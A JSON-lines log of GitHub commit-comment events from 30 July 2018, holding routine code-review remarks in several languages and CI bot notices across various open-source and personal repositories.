{"id":"8037621309","type":"CommitCommentEvent","actor":{"login":"MatthewScholefield"},"repo":{"name":"MycroftAI/mycroft-core"},"payload":{"comment":{"id":29886649,"position":null,"line":null,"path":null,"commit_id":"c292de0dea8ba74e32a4973a9d3645b35cc965fd","created_at":"2018-07-30T13:14:09Z","updated_at":"2018-07-30T13:14:09Z","author_association":"MEMBER","body":"@ashaygore If you have a question please file a bug report but if you just want to talk join us as https://chat.mycroft.ai"}},"created_at":"2018-07-30T13:14:09Z"}
{"id":"8037626999","type":"CommitCommentEvent","actor":{"login":"GuardianRM"},"repo":{"name":"GuardianRM/Stockfish"},"payload":{"comment":{"id":29886657,"position":null,"line":null,"path":null,"commit_id":"96c54b69f8a60c31b66751b56bf9fd0a64d1771a","created_at":"2018-07-30T13:15:10Z","updated_at":"2018-07-30T13:15:10Z","author_association":"OWNER","body":"Ok, thanks, did not consider this."}},"created_at":"2018-07-30T13:15:10Z"}
{"id":"8037627157","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29886658,"position":10,"line":54,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"203f87839acc069696091c2a77983f944bf3104d","created_at":"2018-07-30T13:15:12Z","updated_at":"2018-07-30T13:15:12Z","author_association":"NONE","body":"В последнем условии у тебя написано\r\n```\r\nelsif !is_right_angeled\r\n```\r\nВместо этого, можно написать просто `else`, так-как все остальные сценарии мы уже обработали"}},"created_at":"2018-07-30T13:15:12Z"}
{"id":"8037627892","type":"CommitCommentEvent","actor":{"login":"loicbenoit"},"repo":{"name":"VilledeMontreal/fields"},"payload":{"comment":{"id":29886662,"position":null,"line":null,"path":null,"commit_id":"03a4deaf9ca87c76fcd3dc43511bd1c52d07c952","created_at":"2018-07-30T13:15:19Z","updated_at":"2018-07-30T13:15:19Z","author_association":"COLLABORATOR","body":"Warning: This is a hack with side effects. The general assumption of plugin Fields is that objects are never removed, nor renamed. There will be some issues (errors) in plugin Fields when removing objects created with plugin GenericObjects. Additionnal side effects are possible."}},"created_at":"2018-07-30T13:15:19Z"}
{"id":"8037628325","type":"CommitCommentEvent","actor":{"login":"GustavoOS"},"repo":{"name":"GustavoOS/portugol-online"},"payload":{"comment":{"id":29886665,"position":null,"line":null,"path":null,"commit_id":"a40272b745c6106a767ed65df3675b3db7922050","created_at":"2018-07-30T13:15:23Z","updated_at":"2018-07-30T13:15:23Z","author_association":"OWNER","body":"Troca o método de saída de console log para output_error, mas que por sua vez chama o método console.log"}},"created_at":"2018-07-30T13:15:23Z"}
{"id":"8037630967","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29886671,"position":6,"line":18,"path":"src/Umbraco.Core/Persistence/Migrations/Upgrades/TargetVersionSevenTwelveZero/IncreaseLanguageIsoCodeColumnLength.cs","commit_id":"f11c71599b7f3589f68efefb9df1cb38750c6a14","created_at":"2018-07-30T13:15:52Z","updated_at":"2018-07-30T13:15:52Z","author_association":"MEMBER","body":"Yup we have that method: `Delete.Index` :)\r\n"}},"created_at":"2018-07-30T13:15:52Z"}
{"id":"8037645438","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886695,"position":null,"line":null,"path":null,"commit_id":"888db5d138ae543b9b64838788bf1af177c4fed1","created_at":"2018-07-30T13:18:26Z","updated_at":"2018-07-30T13:18:26Z","author_association":"CONTRIBUTOR","body":"gjjngfvjgfjgjghmjgh"}},"created_at":"2018-07-30T13:18:26Z"}
{"id":"8037647230","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"shiyaroo/blog1"},"payload":{"comment":{"id":29886699,"position":5,"line":5,"path":"footer.php","commit_id":"40fb59211bba3d074611a828588d5dced7edb5e6","created_at":"2018-07-30T13:18:45Z","updated_at":"2018-07-30T13:18:45Z","author_association":"NONE","body":"це усе також в файл з стилями\r\n"}},"created_at":"2018-07-30T13:18:45Z"}
{"id":"8037647284","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29886700,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-30T13:18:46Z","updated_at":"2018-07-30T13:18:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T13:18:46Z"}
{"id":"8037648740","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29886704,"position":null,"line":null,"path":null,"commit_id":"411721e966c5e4333bd8a1890e4ed64029f5e594","created_at":"2018-07-30T13:19:00Z","updated_at":"2018-07-30T13:19:00Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-326](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-326).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-326-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-30T13:19:00Z"}
{"id":"8037651201","type":"CommitCommentEvent","actor":{"login":"jdemeyer"},"repo":{"name":"jdemeyer/cpython"},"payload":{"comment":{"id":29886709,"position":22,"line":350,"path":"Include/object.h","commit_id":"ea8e94921f528544865e49352413eb2101e7640c","created_at":"2018-07-30T13:19:26Z","updated_at":"2018-07-30T13:19:26Z","author_association":"OWNER","body":"> sizeof(int (*printfunc)(PyObject *, FILE *, int)) can be different from sizeof(Py_ssize_t).\r\n\r\nFirst of all, I think on all commonly-used systems, those sizes are actually the same. Second, even if the sizes are different, why would that be a problem? The layout of `PyTypeObject` is not considered to be part of the stable ABI."}},"created_at":"2018-07-30T13:19:26Z"}
{"id":"8037654703","type":"CommitCommentEvent","actor":{"login":"garynych"},"repo":{"name":"gnome-mpv/gnome-mpv"},"payload":{"comment":{"id":29886715,"position":null,"line":null,"path":null,"commit_id":"6ff96b5fb550198a30242aa330801ffbeda24f4d","created_at":"2018-07-30T13:20:05Z","updated_at":"2018-07-30T13:20:05Z","author_association":"NONE","body":"this breaks down video playback, only sound present in last ubuntu,arch and fedora etc.\r\n\r\nhttps://aur.archlinux.org/packages/gnome-mpv-git last my comment"}},"created_at":"2018-07-30T13:20:05Z"}
{"id":"8037659741","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29886728,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-30T13:20:57Z","updated_at":"2018-07-30T13:20:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T13:20:57Z"}
{"id":"8037659876","type":"CommitCommentEvent","actor":{"login":"hellsbells6"},"repo":{"name":"yndx-metrika/logs_api_integration"},"payload":{"comment":{"id":29886729,"position":null,"line":null,"path":null,"commit_id":"d8cc488c1b2c2306ad8e5b3934abe5100f61c67e","created_at":"2018-07-30T13:20:58Z","updated_at":"2018-07-30T13:20:58Z","author_association":"NONE","body":"кажется последняя строка должна быть такой : return not is_null  :) "}},"created_at":"2018-07-30T13:20:58Z"}
{"id":"8037664301","type":"CommitCommentEvent","actor":{"login":"madieatv"},"repo":{"name":"openatv/enigma2"},"payload":{"comment":{"id":29886737,"position":null,"line":null,"path":null,"commit_id":"aaf5fea62a767e3eae4ac65a45948c496fc531b8","created_at":"2018-07-30T13:21:40Z","updated_at":"2018-07-30T13:21:40Z","author_association":"MEMBER","body":"Was ist denn ne Kanalseite?"}},"created_at":"2018-07-30T13:21:40Z"}
{"id":"8037664654","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886738,"position":null,"line":null,"path":null,"commit_id":"fc3169072eac543142c7413cbc1dfc0b2bc7ada9","created_at":"2018-07-30T13:21:44Z","updated_at":"2018-07-30T13:21:44Z","author_association":"CONTRIBUTOR","body":"ijlpuiojoij0"}},"created_at":"2018-07-30T13:21:44Z"}
{"id":"8037665690","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29886743,"position":25,"line":27,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"2de5b4c4749ab876f9bf360a9e19369c5fef68f6","created_at":"2018-07-30T13:21:54Z","updated_at":"2018-07-30T13:21:54Z","author_association":"NONE","body":"Это уже близко к нужному варианту, но это сломается, когда дискрминант будет меньше 0. Вот эту строку нужно перенести вниз в условие где дискрминант больше 0. Тем более в этой ветке и находятся 2 места, где мы используем square_root"}},"created_at":"2018-07-30T13:21:54Z"}
{"id":"8037667169","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29886744,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-30T13:22:09Z","updated_at":"2018-07-30T13:22:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T13:22:09Z"}
{"id":"8037667586","type":"CommitCommentEvent","actor":{"login":"dgreenhalgh"},"repo":{"name":"CodingItWrong/react-native-website"},"payload":{"comment":{"id":29886747,"position":145,"line":782,"path":"docs/integration-with-existing-apps.md","commit_id":"ccf69503986c302092ec00ec9620a7f39d55bb17","created_at":"2018-07-30T13:22:13Z","updated_at":"2018-07-30T13:22:13Z","author_association":"NONE","body":"Late initialization always you to bend Kotlin's initialization rules so that you don't have to assign a value at declaration. This means that you can declare a value without having to assign it to some non-value like null.\r\n\r\nSo you shouldn't have to safe call anything on `reactRootView` or `reactInstanceManager`."}},"created_at":"2018-07-30T13:22:13Z"}
{"id":"8037667927","type":"CommitCommentEvent","actor":{"login":"W4gs"},"repo":{"name":"SimCMinMax/AutoSimC"},"payload":{"comment":{"id":29886749,"position":8,"line":74,"path":"launch-ubuntu.sh","commit_id":"48b63773618e48f41f496cad3b81213eb15b22d3","created_at":"2018-07-30T13:22:17Z","updated_at":"2018-07-30T13:22:17Z","author_association":"CONTRIBUTOR","body":"$? is a variable holding the return value of the last command you ran.\r\n"}},"created_at":"2018-07-30T13:22:17Z"}
{"id":"8037711580","type":"CommitCommentEvent","actor":{"login":"baerkins"},"repo":{"name":"bluecadet/greene-space"},"payload":{"comment":{"id":29886864,"position":null,"line":null,"path":null,"commit_id":"e8b0a908029cde946be8531a49c2b0a94a381430","created_at":"2018-07-30T13:29:47Z","updated_at":"2018-07-30T13:29:47Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-2-greene-space.pantheonsite.io/)\n\nCreated multidev environment [pr-2](https://dashboard.pantheon.io/sites/1ffe8818-30b8-4947-851f-e8a90715b486#pr-2) for greene-space."}},"created_at":"2018-07-30T13:29:47Z"}
{"id":"8037713095","type":"CommitCommentEvent","actor":{"login":"anoxic"},"repo":{"name":"cpscc/wiki"},"payload":{"comment":{"id":29886871,"position":null,"line":null,"path":null,"commit_id":"5072dd36def0539487e0146c73e4aaebfdbfeaef","created_at":"2018-07-30T13:30:04Z","updated_at":"2018-07-30T13:30:04Z","author_association":"CONTRIBUTOR","body":"seems unlikely most of the time"}},"created_at":"2018-07-30T13:30:04Z"}
{"id":"8037716915","type":"CommitCommentEvent","actor":{"login":"daisyagraw"},"repo":{"name":"wenyh01/food-management"},"payload":{"comment":{"id":29886876,"position":null,"line":null,"path":null,"commit_id":"97a6882fea85379e7b39872b66f7d0fb08233dd5","created_at":"2018-07-30T13:30:43Z","updated_at":"2018-07-30T13:30:43Z","author_association":"COLLABORATOR","body":"this is where I changed the heading whoops the comment is after"}},"created_at":"2018-07-30T13:30:43Z"}
{"id":"8037732830","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29886910,"position":null,"line":null,"path":null,"commit_id":"0b7a8fad0493cebdd80fb1156ad7d00b40667b88","created_at":"2018-07-30T13:33:26Z","updated_at":"2018-07-30T13:33:26Z","author_association":"COLLABORATOR","body":"@smiths Third time's a charm - e7b3459"}},"created_at":"2018-07-30T13:33:26Z"}
{"id":"8037737407","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/runtime-tools"},"payload":{"comment":{"id":29886913,"position":32,"line":19,"path":"validation/mounts/mounts.go","commit_id":"15bb818bbc95bbad5033aa0fa31d7e7f7af3de84","created_at":"2018-07-30T13:34:13Z","updated_at":"2018-07-30T13:34:13Z","author_association":"MEMBER","body":"`g.SetLinuxRootPropagation()` is for the rootfs propagation mount. But the tests on each test case are about the propagation mode of a specific mount, not the rootfs."}},"created_at":"2018-07-30T13:34:13Z"}
{"id":"8037738345","type":"CommitCommentEvent","actor":{"login":"gellys"},"repo":{"name":"gellys/curso-javascript-ninja"},"payload":{"comment":{"id":29886916,"position":21,"line":21,"path":"challenge-09/challenge-09.js","commit_id":"51ae15ed8a34ae2ddd1012799f7881ae3d89deb2","created_at":"2018-07-30T13:34:23Z","updated_at":"2018-07-30T13:34:23Z","author_association":"OWNER","body":"function myFunction() {\r\n\tvar number1 = 10;\r\n\tvar number2 = 20;\r\n    console.log( 'Na função `myFunction`, o primeiro número é', number1 );\r\n    console.log( 'Na função `myFunction`, o segundo número é', number2 );\r\n    return number1 + number2;\r\n}"}},"created_at":"2018-07-30T13:34:23Z"}
{"id":"8037741359","type":"CommitCommentEvent","actor":{"login":"torvitas"},"repo":{"name":"manics/kubespray"},"payload":{"comment":{"id":29886924,"position":3,"line":2,"path":"contrib/network-storage/heketi/heketi-tear-down.yml","commit_id":"5fdf1615708e17b606001b7b4cae1c3fb8ee5169","created_at":"2018-07-30T13:34:53Z","updated_at":"2018-07-30T13:34:53Z","author_association":"NONE","body":"shouldn't this role run on all nodes?"}},"created_at":"2018-07-30T13:34:53Z"}
{"id":"8037742347","type":"CommitCommentEvent","actor":{"login":"kcarroll88"},"repo":{"name":"kcarroll88/developers"},"payload":{"comment":{"id":29886928,"position":null,"line":null,"path":null,"commit_id":"0e948e1925a2e7a0797c8632384826c0f585ad08","created_at":"2018-07-30T13:35:03Z","updated_at":"2018-07-30T13:35:03Z","author_association":"OWNER","body":"Added my name for the video"}},"created_at":"2018-07-30T13:35:03Z"}
{"id":"8037742632","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"shiyaroo/blog1"},"payload":{"comment":{"id":29886929,"position":1,"line":1,"path":"contact.php","commit_id":"40fb59211bba3d074611a828588d5dced7edb5e6","created_at":"2018-07-30T13:35:07Z","updated_at":"2018-07-30T13:35:07Z","author_association":"NONE","body":"Почитай стандарти php https://www.php-fig.org/psr/\r\n"}},"created_at":"2018-07-30T13:35:07Z"}
{"id":"8037745624","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":29886936,"position":null,"line":null,"path":null,"commit_id":"96d86c219c36db77b72b2a2985b3277fec98b839","created_at":"2018-07-30T13:35:37Z","updated_at":"2018-07-30T13:35:37Z","author_association":"COLLABORATOR","body":"[book.storage.admin_color_en.pdf](https://github.com/SUSE/doc-ses/files/2241303/book.storage.admin_color_en.pdf)\r\n"}},"created_at":"2018-07-30T13:35:37Z"}
{"id":"8037745965","type":"CommitCommentEvent","actor":{"login":"zhangsenmian"},"repo":{"name":"zhangsenmian/test2"},"payload":{"comment":{"id":29886939,"position":null,"line":null,"path":null,"commit_id":"9c91f3316cb0274c103995f698b3cc970f67d2e3","created_at":"2018-07-30T13:35:40Z","updated_at":"2018-07-30T13:35:40Z","author_association":"OWNER","body":"123214"}},"created_at":"2018-07-30T13:35:40Z"}
{"id":"8037748056","type":"CommitCommentEvent","actor":{"login":"zhangsenmian"},"repo":{"name":"zhangsenmian/test2"},"payload":{"comment":{"id":29886942,"position":null,"line":null,"path":null,"commit_id":"9c91f3316cb0274c103995f698b3cc970f67d2e3","created_at":"2018-07-30T13:36:02Z","updated_at":"2018-07-30T13:36:02Z","author_association":"OWNER","body":"11111111111"}},"created_at":"2018-07-30T13:36:02Z"}
{"id":"8037749367","type":"CommitCommentEvent","actor":{"login":"junyingjy"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29886949,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T13:36:15Z","updated_at":"2018-07-30T13:36:15Z","author_association":"NONE","body":"还是不行，如果重新安装2.0.2就没问题"}},"created_at":"2018-07-30T13:36:15Z"}
{"id":"8037750635","type":"CommitCommentEvent","actor":{"login":"ecthiender"},"repo":{"name":"frasertweedale/hs-jose"},"payload":{"comment":{"id":29886951,"position":null,"line":null,"path":null,"commit_id":"59ca5e656370e5b7812faadf5234aa9b0724e782","created_at":"2018-07-30T13:36:27Z","updated_at":"2018-07-30T13:36:27Z","author_association":"NONE","body":"Are you waiting on anything to merge this?"}},"created_at":"2018-07-30T13:36:27Z"}
{"id":"8037759848","type":"CommitCommentEvent","actor":{"login":"bartleyg"},"repo":{"name":"loomnetwork/homebrew-client"},"payload":{"comment":{"id":29886977,"position":null,"line":null,"path":null,"commit_id":"f4bc2d843c7bc39a0bfb55139655fadc0772ed17","created_at":"2018-07-30T13:38:04Z","updated_at":"2018-07-30T13:38:04Z","author_association":"NONE","body":"any chance we can see a changelog or release notes with these updates? thanks"}},"created_at":"2018-07-30T13:38:04Z"}
{"id":"8037764121","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29886987,"position":null,"line":null,"path":null,"commit_id":"c02358c32ba48c3382f8e133056944ed71393b2a","created_at":"2018-07-30T13:38:44Z","updated_at":"2018-07-30T13:38:44Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/13/display/redirect) (on internal Jenkins) failed in stage 'Run device tests' 🔥 : hudson.AbortException: script returned exit code 255\n\n🔥 [Failed to publish results](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/13//console) 🔥\n🔥 [Failed to publish results](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/13//console) 🔥\n🔥 [Test run failed]() 🔥\n"}},"created_at":"2018-07-30T13:38:44Z"}
{"id":"8037764286","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"shiyaroo/blog1"},"payload":{"comment":{"id":29886988,"position":1,"line":1,"path":"contact.php","commit_id":"40fb59211bba3d074611a828588d5dced7edb5e6","created_at":"2018-07-30T13:38:46Z","updated_at":"2018-07-30T13:38:46Z","author_association":"NONE","body":"Також почитай про адаптивну верстку (Bootstrap)"}},"created_at":"2018-07-30T13:38:46Z"}
{"id":"8037764361","type":"CommitCommentEvent","actor":{"login":"dschaper"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":29886989,"position":6,"line":1224,"path":"automated install/basic-install.sh","commit_id":"17c1e64f7e3417b592d677e9ffdacf05ab833c28","created_at":"2018-07-30T13:38:47Z","updated_at":"2018-07-30T13:38:47Z","author_association":"MEMBER","body":"${USER} is the user that called the script, this probably should be `pihole:pihole` and not effective `root:root`. Also, use `install` and link `/dev/null` instead of `touch` to set the proper user and permissions."}},"created_at":"2018-07-30T13:38:47Z"}
{"id":"8037766609","type":"CommitCommentEvent","actor":{"login":"waharnum"},"repo":{"name":"kunal-mohta/fluid-adaptive-content-service"},"payload":{"comment":{"id":29886996,"position":null,"line":null,"path":null,"commit_id":"2b204f183570a63897459de63d8e805b513ff1a3","created_at":"2018-07-30T13:39:11Z","updated_at":"2018-07-30T13:39:11Z","author_association":"NONE","body":"A few quick comments on this, which mostly looks good to me:\r\n\r\n- Minor grammatical comment - while there's some debate about middleware vs. middlewares as the plural usage, our usage in Kettle is that the plural is \"middleware\", not \"middlewares\" (thus, the middleware stack in a request handler grade is called `requestMiddleware`, not `requestMiddlewares`) - I'd rename your file accordingly.\r\n\r\n- Rather than encode the version values being checked directly into the function, they should be contained in a data structure on the middleware grade - you can use the standard `args` option of the `handle` invoker to pass in a `{that}` reference or similar to gain access to them in the function\r\n\r\n- since all of your handlers will want to use the version checking, you can extract the common material to what's called a mix-in grade (a block of configuration that's intended to be used in other grades to supply common shared options). This would look something like the following:\r\n\r\n```\r\n// Mix-in grade to hold common middleware configuration material for all handlers\r\nfluid.defaults(\"adaptiveContentService.handlers.commonMiddleware\", {\r\n    requestMiddleware: {\r\n        \"versionCheck\": {\r\n            middleware: \"{server}.versionCheck\"\r\n        }\r\n    }\r\n});\r\n\r\n// A handler grade using the mix-in grade\r\nfluid.defaults(\"adaptiveContentService.handlers.translation\", {\r\n   gradeNames: [\"adaptiveContentService.handlers.commonMiddleware\", \"kettle.request.http\"],\r\n   ...\r\n});\r\n```"}},"created_at":"2018-07-30T13:39:11Z"}
{"id":"8037767629","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29886997,"position":5,"line":36,"path":"src/charset.h","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-30T13:39:21Z","updated_at":"2018-07-30T13:39:21Z","author_association":"OWNER","body":"Suspect cause of #3333 ?"}},"created_at":"2018-07-30T13:39:21Z"}
{"id":"8037768148","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"pypa/pipenv"},"payload":{"comment":{"id":29886998,"position":17,"line":17,"path":"pipenv/patched/piptools/LICENSE.txt","commit_id":"7151583f1ca69e55b82c48ff6ca16e3025fa2b0c","created_at":"2018-07-30T13:39:26Z","updated_at":"2018-07-30T13:39:26Z","author_association":"CONTRIBUTOR","body":"Where is this coming from? piptools is BSD."}},"created_at":"2018-07-30T13:39:26Z"}
{"id":"8037768330","type":"CommitCommentEvent","actor":{"login":"dschaper"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":29886999,"position":6,"line":1224,"path":"automated install/basic-install.sh","commit_id":"17c1e64f7e3417b592d677e9ffdacf05ab833c28","created_at":"2018-07-30T13:39:27Z","updated_at":"2018-07-30T13:39:27Z","author_association":"MEMBER","body":"Relocate to the `installConfig` function, this is not a script."}},"created_at":"2018-07-30T13:39:27Z"}
{"id":"8037769452","type":"CommitCommentEvent","actor":{"login":"JettScythe"},"repo":{"name":"startpages/startpages.github.io"},"payload":{"comment":{"id":29887000,"position":null,"line":null,"path":null,"commit_id":"947bda705884573437d00167cd693be9a5e9efa7","created_at":"2018-07-30T13:39:40Z","updated_at":"2018-07-30T13:39:40Z","author_association":"CONTRIBUTOR","body":"Updated, should use new image_url"}},"created_at":"2018-07-30T13:39:40Z"}
{"id":"8037769650","type":"CommitCommentEvent","actor":{"login":"methane"},"repo":{"name":"jdemeyer/cpython"},"payload":{"comment":{"id":29887002,"position":22,"line":350,"path":"Include/object.h","commit_id":"ea8e94921f528544865e49352413eb2101e7640c","created_at":"2018-07-30T13:39:42Z","updated_at":"2018-07-30T13:39:42Z","author_association":"NONE","body":"Hmm, I forgot why we should pay special care when adding new slot, if type object can be not stable..."}},"created_at":"2018-07-30T13:39:42Z"}
{"id":"8037772190","type":"CommitCommentEvent","actor":{"login":"W4gs"},"repo":{"name":"SimCMinMax/AutoSimC"},"payload":{"comment":{"id":29887007,"position":null,"line":null,"path":null,"commit_id":"48b63773618e48f41f496cad3b81213eb15b22d3","created_at":"2018-07-30T13:40:09Z","updated_at":"2018-07-30T13:40:09Z","author_association":"CONTRIBUTOR","body":"$? is a variable holding the return value of the last command you ran.\r\nIn this case, $? holds the command cat /etc/redhat-release | grep Fedora > /dev/null.\r\nIt gets the contents of /etc/redhat-release and greps it out to see if its Fedora then redirects the input into /dev/null to hide it from the users view.\r\nIt returns a 1 if:\r\na) /etc/redhat-release doesn't exist\r\nb) /etc/redhat-release doesn't contains Fedora\r\nIt returns 0 if:\r\na) /etc/redhat-release exists AND contains Fedora in the file."}},"created_at":"2018-07-30T13:40:09Z"}
{"id":"8037773668","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29887012,"position":null,"line":null,"path":null,"commit_id":"7c284114942b7167a6e879b46c60462f024a211a","created_at":"2018-07-30T13:40:22Z","updated_at":"2018-07-30T13:40:22Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: libraries/classes/Header.php"}},"created_at":"2018-07-30T13:40:22Z"}
{"id":"8037774849","type":"CommitCommentEvent","actor":{"login":"shadrina"},"repo":{"name":"belyaev-mikhail/kt-grammar-tester"},"payload":{"comment":{"id":29887017,"position":219,"line":392,"path":"src/main/antlr4/KotlinParser.g4","commit_id":"1e599fa0f98b1b2c9e851303fd695538569073b5","created_at":"2018-07-30T13:40:34Z","updated_at":"2018-07-30T13:40:34Z","author_association":"NONE","body":"Есть тесты, в которых это сломает правильный приоритет."}},"created_at":"2018-07-30T13:40:34Z"}
{"id":"8037775019","type":"CommitCommentEvent","actor":{"login":"flibitijibibo"},"repo":{"name":"FNA-XNA/FNA"},"payload":{"comment":{"id":29887018,"position":null,"line":null,"path":null,"commit_id":"b07f85313f4607fc197ee99461501afb37ccb01b","created_at":"2018-07-30T13:40:35Z","updated_at":"2018-07-30T13:40:35Z","author_association":"MEMBER","body":"@0x0ade Does the driver that exports a stub function specifically stub `glDrawRangeElementsBaseVertexOES` or does it also stub `glDrawRangeElementsBaseVertex`? ES 3.2 supports the latter so if the dumb driver only stubs the former I'd like to tweak this to check for the 3.2 entry point."}},"created_at":"2018-07-30T13:40:35Z"}
{"id":"8037775640","type":"CommitCommentEvent","actor":{"login":"dschaper"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":29887020,"position":7,"line":1225,"path":"automated install/basic-install.sh","commit_id":"17c1e64f7e3417b592d677e9ffdacf05ab833c28","created_at":"2018-07-30T13:40:41Z","updated_at":"2018-07-30T13:40:41Z","author_association":"MEMBER","body":"...`${PI_HOLE_INSTALL_DIR}/pihole-FTL.conf`"}},"created_at":"2018-07-30T13:40:41Z"}
{"id":"8037782539","type":"CommitCommentEvent","actor":{"login":"W4gs"},"repo":{"name":"SimCMinMax/AutoSimC"},"payload":{"comment":{"id":29887039,"position":8,"line":74,"path":"launch-ubuntu.sh","commit_id":"48b63773618e48f41f496cad3b81213eb15b22d3","created_at":"2018-07-30T13:41:49Z","updated_at":"2018-07-30T13:41:49Z","author_association":"CONTRIBUTOR","body":"Good catch, have to swap these 2 lines"}},"created_at":"2018-07-30T13:41:49Z"}
